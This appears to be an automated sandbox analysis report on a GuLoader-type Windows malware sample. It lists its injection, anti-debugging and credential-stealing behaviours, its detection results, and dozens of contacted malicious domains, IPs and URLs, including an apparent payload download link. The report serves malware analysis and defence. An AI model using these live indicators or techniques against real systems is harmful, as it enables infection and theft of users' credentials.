        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 530346 Sample: BL_CI_PL.exe Startdate: 29/11/2021 Architecture: WINDOWS Score: 100 60 www.testwebsite0711.com 2->60 62 www.talkingpoint.tours 2->62 64 43 other IPs or domains 2->64 68 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 76 9 other signatures 2->76 10 BL_CI_PL.exe 1 2->10         started        signatures3 74 Tries to resolve many domain names, but no domain seems valid 62->74 process4 signatures5 108 Uses ipconfig to lookup or modify the Windows network settings 10->108 110 Tries to detect Any.run 10->110 112 Hides threads from debuggers 10->112 13 BL_CI_PL.exe 6 10->13         started        process6 dnsIp7 66 bgreenidaho.com 20.124.109.2, 443, 49807, 49842 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->66 114 Modifies the context of a thread in another process (thread injection) 13->114 116 Tries to detect Any.run 13->116 118 Maps a DLL or memory area into another process 13->118 122 3 other signatures 13->122 17 explorer.exe 5 9 13->17 injected 22 ipconfig.exe 1 12 13->22         started        signatures8 120 Tries to resolve many domain names, but no domain seems valid 66->120 process9 dnsIp10 54 dietatrintadias.com 216.172.172.87, 49817, 49827, 49846 UNIFIEDLAYER-AS-1US United States 17->54 56 dif-directory.xyz 185.61.153.97, 49859, 80 NAMECHEAP-NETUS United Kingdom 17->56 58 17 other IPs or domains 17->58 52 C:\Users\user\AppData\Local\...\k4n8p7lb.exe, PE32 17->52 dropped 78 System process connects to network (likely due to code injection or exploit) 17->78 80 Benign windows process drops PE files 17->80 82 Uses netstat to query active network connections and open ports 17->82 24 k4n8p7lb.exe 1 17->24         started        27 k4n8p7lb.exe 1 17->27         started        29 k4n8p7lb.exe 1 17->29         started        37 3 other processes 17->37 84 Tries to steal Mail credentials (via file / registry access) 22->84 86 Self deletion via cmd delete 22->86 88 Tries to harvest and steal browser information (history, passwords, etc) 22->88 90 4 other signatures 22->90 31 cmd.exe 2 22->31         started        33 cmd.exe 1 22->33         started        35 firefox.exe 22->35         started        file11 signatures12 process13 signatures14 102 Tries to detect Any.run 24->102 104 Hides threads from debuggers 24->104 39 k4n8p7lb.exe 6 24->39         started        42 k4n8p7lb.exe 6 27->42         started        44 k4n8p7lb.exe 29->44         started        106 Tries to harvest and steal browser information (history, passwords, etc) 31->106 46 conhost.exe 31->46         started        48 conhost.exe 33->48         started        50 k4n8p7lb.exe 37->50         started        process15 signatures16 92 Sample uses process hollowing technique 39->92 94 Hides threads from debuggers 39->94 96 Modifies the context of a thread in another process (thread injection) 42->96 98 Tries to detect Any.run 42->98 100 Maps a DLL or memory area into another process 42->100

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        BL_CI_PL.exe20%VirustotalBrowse
        BL_CI_PL.exe11%MetadefenderBrowse
        BL_CI_PL.exe9%ReversingLabsWin32.Downloader.GuLoader

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\T5jfdetbp\k4n8p7lb.exe11%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\T5jfdetbp\k4n8p7lb.exe9%ReversingLabsWin32.Downloader.GuLoader

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        24.0.firefox.exe.2232796c.1.unpack100%AviraTR/Dropper.GenDownload File
        24.2.firefox.exe.2232796c.0.unpack100%AviraTR/Dropper.GenDownload File
        29.2.wscript.exe.4f3796c.4.unpack100%AviraTR/Dropper.GenDownload File
        14.2.ipconfig.exe.3f3796c.4.unpack100%AviraTR/Dropper.GenDownload File
        14.2.ipconfig.exe.3591ee8.1.unpack100%AviraTR/Dropper.GenDownload File
        29.2.wscript.exe.2ac9e48.1.unpack100%AviraTR/Dropper.GenDownload File
        28.2.NETSTAT.EXE.2ed2880.1.unpack100%AviraTR/Dropper.GenDownload File
        28.2.NETSTAT.EXE.387796c.4.unpack100%AviraTR/Dropper.GenDownload File
        24.0.firefox.exe.2232796c.0.unpack100%AviraTR/Dropper.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        www.lopsrental.lease3%VirustotalBrowse
        www.yghdlhax.xyz0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://bgreenidaho.com/Newfile/bin_UFDek247.bin0%Avira URL Cloudsafe
        http://www.dif-directory.xyz/n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c100%Avira URL Cloudphishing
        http://www.ayudavida.com/n8ds/?lZOD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&3fVD2v=9rZXD0c8pBS0%Avira URL Cloudsafe
        http://www.growebox.com/n8ds/0%Avira URL Cloudsafe
        http://www.effective.store/n8ds/?lZOD=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR&3fVD2v=9rZXD0c8pBS0%Avira URL Cloudsafe
        https://bgreenidaho.com/Newfile/bin_UFDek247.binentVersion0%Avira URL Cloudsafe
        http://www.mummymotors.com0%Avira URL Cloudsafe
        www.ayudavida.com/n8ds/0%Avira URL Cloudsafe
        http://www.littlefishth.com/n8ds/0%Avira URL Cloudsafe
        http://www.talkingpoint.tours/n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF0%Avira URL Cloudsafe
        http://www.littlefishth.com/n8ds/?lZOD=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&y6AH=yHQDs0%Avira URL Cloudsafe
        http://schemas.micro0%Avira URL Cloudsafe
        https://bgreenidaho.com/Newfile/bin_UFDek247.binQ0%Avira URL Cloudsafe
        https://bgreenidaho.com/Newfile/bin_UFDek247.binleK0%Avira URL Cloudsafe
        http://www.dietatrintadias.com/n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS0%Avira URL Cloudsafe
        https://bgreenidaho.com/Newfile/bin_UFDek247.bin)0%Avira URL Cloudsafe
        http://www.helpcloud.xyz/n8ds/0%Avira URL Cloudsafe
        http://www.yghdlhax.xyz/n8ds/?lZOD=prkX5vIEewOKdb4uapSD5zP9OaJ72kAqHOW75HdD0V+URkfePb3G34/1ninLd5DC/lUo&y6AH=yHQDs100%Avira URL Cloudphishing
        http://www.unitedmetal-saudi.com/n8ds/?lZOD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&E0Dpk=l8hHaF0%Avira URL Cloudsafe
        http://www.lopsrental.lease/n8ds/0%Avira URL Cloudsafe
        http://www.gdav130.xyz/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF140%Avira URL Cloudsafe
        http://www.growebox.com/n8ds/?lZOD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&y6AH=yHQDs0%Avira URL Cloudsafe
        http://www.stylesbykee.com/n8ds/0%Avira URL Cloudsafe
        http://www.lopsrental.lease/n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&y6AH=yHQDs0%Avira URL Cloudsafe
        https://bgreenidaho.com/Newfile/bin_UFDek247.bin%0%Avira URL Cloudsafe
        http://www.divorcefearfreedom.com/n8ds/?B85P=7nvHaF&lZOD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv90%Avira URL Cloudsafe
        https://bgreenidaho.com/Newfile/bin_UFDek247.bin90%Avira URL Cloudsafe
        https://bgreenidaho.com/%0%Avira URL Cloudsafe
        https://bgreenidaho.com/Newfile/bin_UFDek247.bin=0%Avira URL Cloudsafe
        http://www.topwowshopping.store/n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&B85P=7nvHaF0%Avira URL Cloudsafe
        http://www.mackthetruck.com/n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaF0%Avira URL Cloudsafe
        http://www.mummymotors.com/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn0%Avira URL Cloudsafe
        https://bgreenidaho.com/U0%Avira URL Cloudsafe
        http://www.dietatrintadias.com/n8ds/0%Avira URL Cloudsafe
        http://www.diggingquartz.com/n8ds/?lZOD=JCnWpsMsE1LhJoPwCBaMQ23aQlJM1lBrGqYKhWEiZBh+41Ky2Bnma6QhJDV2RS4wXNsD&3fVD2v=9rZXD0c8pBS0%Avira URL Cloudsafe
        http://www.yghdlhax.xyz/n8ds/100%Avira URL Cloudphishing
        http://www.lopsrental.lease/n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS0%Avira URL Cloudsafe
        http://www.palmasdelmarcondos.com/n8ds/?lZOD=Jv+KBR9TMcpwNTBIzPqg8qhOh/MOyYoQ7cFMdSYE1xgXhr2Qjx48HBx6QPFrGWZkW9Pq&E0Dpk=l8hHaF0%Avira URL Cloudsafe
        http://www.topwowshopping.store/n8ds/0%Avira URL Cloudsafe
        https://bgreenidaho.com/Newfile/bin_UFDek247.binn0%Avira URL Cloudsafe
        http://www.stylesbykee.com/n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS0%Avira URL Cloudsafe
        https://www.hostgator.com.br0%Avira URL Cloudsafe
        http://www.mummymotors.com/n8ds/0%Avira URL Cloudsafe
        http://www.helpcloud.xyz/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl0%Avira URL Cloudsafe
        http://www.topwowshopping.store/n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&y6AH=yHQDs0%Avira URL Cloudsafe
        https://bgreenidaho.com/0%Avira URL Cloudsafe
        https://excel.offi0%Avira URL Cloudsafe
        https://bgreenidaho.com/Newfile/bin_UFDek247.binu0%Avira URL Cloudsafe
        http://www.fatima2021.com/n8ds/?lZOD=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1&E0Dpk=l8hHaF0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.com
        		34.237.47.210
        		truefalse
          		high
          growebox.com
          		81.2.194.128
          		truetrue
            		unknown
            www.lopsrental.lease
            		66.29.140.185
            		truetrueunknown
            dif-directory.xyz
            		185.61.153.97
            		truetrue
              		unknown
              www.yghdlhax.xyz
              		192.64.119.254
              		truetrueunknown
              www.topwowshopping.store
              		172.67.201.232
              		truetrue
                		unknown
                www.mackthetruck.com
                		203.170.80.250
                		truetrue
                  		unknown
                  mummymotors.com
                  		34.102.136.180
                  		truefalse
                    		unknown
                    littlefishth.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      divorcefearfreedom.com
                      		192.0.78.25
                      		truetrue
                        		unknown
                        www.ayudavida.com
                        		164.155.212.139
                        		truetrue
                          		unknown
                          dietatrintadias.com
                          		216.172.172.87
                          		truetrue
                            		unknown
                            talkingpoint.tours
                            		192.0.78.24
                            		truetrue
                              		unknown
                              zhs.zohosites.com
                              		136.143.191.204
                              		truefalse
                                		high
                                palmasdelmarcondos.com
                                		34.102.136.180
                                		truefalse
                                  		unknown
                                  reliablehomesellers.com
                                  		38.143.25.232
                                  		truetrue
                                    		unknown
                                    diggingquartz.com
                                    		50.62.172.157
                                    		truetrue
                                      		unknown
                                      www.gdav130.xyz
                                      		35.244.144.199
                                      		truefalse
                                        		unknown
                                        www.helpcloud.xyz
                                        		88.99.22.5
                                        		truetrue
                                          		unknown
                                          www.stylesbykee.com
                                          		172.120.157.187
                                          		truetrue
                                            		unknown
                                            bgreenidaho.com
                                            		20.124.109.2
                                            		truetrue
                                              		unknown
                                              www.effective.store
                                              		199.59.242.153
                                              		truetrue
                                                		unknown
                                                www.3uwz9mpxk77g.biz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.testwebsite0711.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.jobl.space
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.palmasdelmarcondos.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.32342231.xyz
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.talkingpoint.tours
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.fatima2021.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.littlefishth.com
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                www.divorcefearfreedom.com
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  www.recruitresumelibrary.com
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    www.growebox.com
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      www.reliablehomesellers.com
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown
                                                                        www.tvterradafarinha.com
                                                                        		unknown
                                                                        		unknowntrue
                                                                          		unknown
                                                                          www.unitedmetal-saudi.com
                                                                          		unknown
                                                                          		unknowntrue
                                                                            		unknown
                                                                            www.diggingquartz.com
                                                                            		unknown
                                                                            		unknowntrue
                                                                              		unknown
                                                                              www.theyachtmarkets.com
                                                                              		unknown
                                                                              		unknowntrue
                                                                                		unknown
                                                                                www.mummymotors.com
                                                                                		unknown
                                                                                		unknowntrue
                                                                                  		unknown
                                                                                  www.csenmoga.com
                                                                                  		unknown
                                                                                  		unknowntrue
                                                                                    		unknown
                                                                                    www.recoverytrivia.com
                                                                                    		unknown
                                                                                    		unknowntrue
                                                                                      		unknown
                                                                                      www.dif-directory.xyz
                                                                                      		unknown
                                                                                      		unknowntrue
                                                                                        		unknown
                                                                                        www.smartam6.xyz
                                                                                        		unknown
                                                                                        		unknowntrue
                                                                                          		unknown
                                                                                          www.dietatrintadias.com
                                                                                          		unknown
                                                                                          		unknowntrue
                                                                                            		unknown

                                                                                            Contacted URLs

                                                                                            NameMaliciousAntivirus DetectionReputation
                                                                                            https://bgreenidaho.com/Newfile/bin_UFDek247.bintrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.dif-directory.xyz/n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4ctrue
                                                                                            • Avira URL Cloud: phishing
                                                                                            		unknown
                                                                                            http://www.ayudavida.com/n8ds/?lZOD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&3fVD2v=9rZXD0c8pBStrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.growebox.com/n8ds/true
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.effective.store/n8ds/?lZOD=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR&3fVD2v=9rZXD0c8pBStrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            www.ayudavida.com/n8ds/true
                                                                                            • Avira URL Cloud: safe
                                                                                            		low
                                                                                            http://www.littlefishth.com/n8ds/false
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.talkingpoint.tours/n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaFtrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.littlefishth.com/n8ds/?lZOD=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&y6AH=yHQDsfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.dietatrintadias.com/n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBStrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.helpcloud.xyz/n8ds/true
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.yghdlhax.xyz/n8ds/?lZOD=prkX5vIEewOKdb4uapSD5zP9OaJ72kAqHOW75HdD0V+URkfePb3G34/1ninLd5DC/lUo&y6AH=yHQDstrue
                                                                                            • Avira URL Cloud: phishing
                                                                                            		unknown
                                                                                            http://www.unitedmetal-saudi.com/n8ds/?lZOD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&E0Dpk=l8hHaFtrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.lopsrental.lease/n8ds/true
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.gdav130.xyz/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14false
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.growebox.com/n8ds/?lZOD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&y6AH=yHQDstrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.stylesbykee.com/n8ds/true
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.lopsrental.lease/n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&y6AH=yHQDstrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.divorcefearfreedom.com/n8ds/?B85P=7nvHaF&lZOD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9true
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.topwowshopping.store/n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&B85P=7nvHaFtrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.mackthetruck.com/n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaFtrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.mummymotors.com/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjnfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.dietatrintadias.com/n8ds/true
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.diggingquartz.com/n8ds/?lZOD=JCnWpsMsE1LhJoPwCBaMQ23aQlJM1lBrGqYKhWEiZBh+41Ky2Bnma6QhJDV2RS4wXNsD&3fVD2v=9rZXD0c8pBStrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.yghdlhax.xyz/n8ds/true
                                                                                            • Avira URL Cloud: phishing
                                                                                            		unknown
                                                                                            http://www.lopsrental.lease/n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBStrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.palmasdelmarcondos.com/n8ds/?lZOD=Jv+KBR9TMcpwNTBIzPqg8qhOh/MOyYoQ7cFMdSYE1xgXhr2Qjx48HBx6QPFrGWZkW9Pq&E0Dpk=l8hHaFfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.topwowshopping.store/n8ds/true
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.stylesbykee.com/n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBStrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.mummymotors.com/n8ds/false
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.helpcloud.xyz/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTltrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.topwowshopping.store/n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&y6AH=yHQDstrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.fatima2021.com/n8ds/?lZOD=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1&E0Dpk=l8hHaFtrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown

                                                                                            URLs from Memory and Binaries

                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                            https://www.msn.com/de-ch/?ocid=iehpmexplorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://www.zoho.com/sites/images/professionally-crafted-themes.pngipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                  		high
                                                                                                  https://bgreenidaho.com/Newfile/bin_UFDek247.binentVersionk4n8p7lb.exe, 0000001A.00000002.29299157566.0000000000738000.00000004.00000020.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.mummymotors.comipconfig.exe, 0000000E.00000002.30171163705.000000000472B000.00000004.00020000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.msn.com/?ocid=iehpgexplorer.exe, 0000000D.00000000.26101409229.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887040916.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25932474197.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25985258552.000000000D658000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://push.zhanzhang.baidu.com/push.jsfirefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpfalse
                                                                                                      		high
                                                                                                      https://excel.office.comexplorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.microexplorer.exe, 0000000D.00000000.25884137732.000000000B010000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.25967238414.0000000003800000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.26095564586.000000000A260000.00000002.00020000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://bgreenidaho.com/Newfile/bin_UFDek247.binQBL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://bgreenidaho.com/Newfile/bin_UFDek247.binleKk4n8p7lb.exe, 0000001B.00000003.29347013124.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000003.29347971433.000000000075E000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29453877035.0000000000750000.00000004.00000020.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://bgreenidaho.com/Newfile/bin_UFDek247.bin)k4n8p7lb.exe, 0000001A.00000002.29299426139.0000000000763000.00000004.00000020.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.msn.com/?ocid=iehpyu1SPSexplorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://bgreenidaho.com/Newfile/bin_UFDek247.bin%k4n8p7lb.exe, 0000001A.00000003.29294372742.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29257058269.0000000000795000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29299837438.0000000000797000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000003.29256180897.0000000000795000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://bgreenidaho.com/Newfile/bin_UFDek247.bin9k4n8p7lb.exe, 0000001A.00000002.29299426139.0000000000763000.00000004.00000020.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://www.msn.com/de-ch/?ocid=iehpexplorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://bgreenidaho.com/%BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://bgreenidaho.com/Newfile/bin_UFDek247.bin=BL_CI_PL.exe, 0000000A.00000003.26182943028.000000000087A000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26188433909.000000000087B000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpfalse
                                                                                                                		high
